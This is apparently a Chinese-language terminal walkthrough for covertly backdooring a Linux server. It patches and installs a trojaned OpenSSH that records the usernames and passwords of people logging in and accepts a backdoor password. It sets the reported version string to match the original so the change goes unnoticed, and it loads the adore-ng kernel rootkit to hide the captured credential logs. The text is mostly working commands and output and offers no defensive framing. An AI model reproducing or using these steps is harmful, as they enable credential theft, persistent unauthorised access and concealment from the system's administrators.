[root@mufeng ~]# mkdir /software
[root@mufeng ~]# cd !$
cd /software
[root@mufeng software]# yum install lr* -y &>/dev/null && echo "ok"
ok
[root@mufeng software]# rz ## 上传软件包
[root@mufeng software]# ls
0x06-openssh-5.9p1.patch.tar.gz openssh-5.9p1.tar.gz
inotify-tools-3.13.tar.gz sshpass-1.06.tar.gz
上传完成包之后,开始对打补丁并进行安装:
二. 对openssh-5.9p1 打后门漏洞补丁
2.1 解压
[root@mufeng software]# tar xf openssh-5.9p1.tar.gz
You have mail in /var/spool/mail/root
[root@mufeng software]# tar xf 0x06-openssh-5.9p1.patch.tar.gz
[root@mufeng software]# ls
0x06-openssh-5.9p1.patch.tar.gz openssh-5.9p1 openssh-5.9p1.tar.gz
inotify-tools-3.13.tar.gz openssh-5.9p1.patch sshpass-1.06.tar.gz
[root@mufeng software]#
[root@mufeng openssh-5.9p1]# ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
[root@mufeng openssh-5.9p1]# make && make install
2.5 启动并查看版本号
[root@mufeng openssh-5.9p1]# service sshd restart
停止 sshd: [确定]
正在启动 sshd: [确定]
[root@mufeng openssh-5.9p1]# ssh -V
OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013
这里一定要设置的与ssh原来的版本号一致,要不然就暴露了。
三. 测试
测试主要基于以下几点:
测试是否可以记录对方登录服务器的账号和密码
测试在用户修改密码后,还能继续记录账号和密码
测试是否可以记录普通用户的密码
测试是否可以使用后门漏洞密码登录系统
3.1 测试能否记录用户名和密码
[root@mufeng tmp]# ssh 192.168.1.43
The authenticity of host '192.168.1.43 (192.168.1.43)' can't be established.
ECDSA key fingerprint is bf:a1:c7:0d:6c:4b:e4:19:f5:b8:16:e3:f8:4a:e5:5c.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.43' (ECDSA) to the list of known hosts.
root@192.168.1.43's password:
Last login: Fri Mar 17 14:40:10 2023 from 192.168.1.4
[root@mufeng ~]# exit
logout
Connection to 192.168.1.43 closed.
[root@mufeng tmp]# ls
ilog olog
##查看是否可以记录密码
[root@mufeng tmp]# cat ilog
user:password --> root:12345678
## 包含用户名+密码+IP
[root@mufeng tmp]# cat olog
user:password@host --> root:12345678@192.168.1.43
[root@mufeng tmp]#
安装
[root@mufeng adore-ng-master]# make
加载模块
[root@mufeng adore-ng-master]# insmod adore-ng.ko
[root@mufeng adore-ng-master]#
查看命令是否安装
[root@mufeng adore-ng-master]# ./ava h
Usage: ./ava h,u,r,R,i,v,U [file or PID]
I print info (secret UID etc)
h hide file# 隐藏文件
u unhide file## 不隐藏
r execute as root ## 像root一样去运行
R remove PID forever
U uninstall adore
i make PID invisible ## 隐藏进程
v make PID visible
4.2 隐藏文件
需要隐藏 ilog, olog
[root@mufeng adore-ng-master]# ./ava h /tmp/ilog
56,0,0,56
Adore 1.56 installed. Good luck.
File '/tmp/ilog' is now hidden.
[root@mufeng adore-ng-master]#
[root@mufeng adore-ng-master]# ./ava h /tmp/olog
56,0,0,56
Adore 1.56 installed. Good luck.
File '/tmp/olog' is now hidden.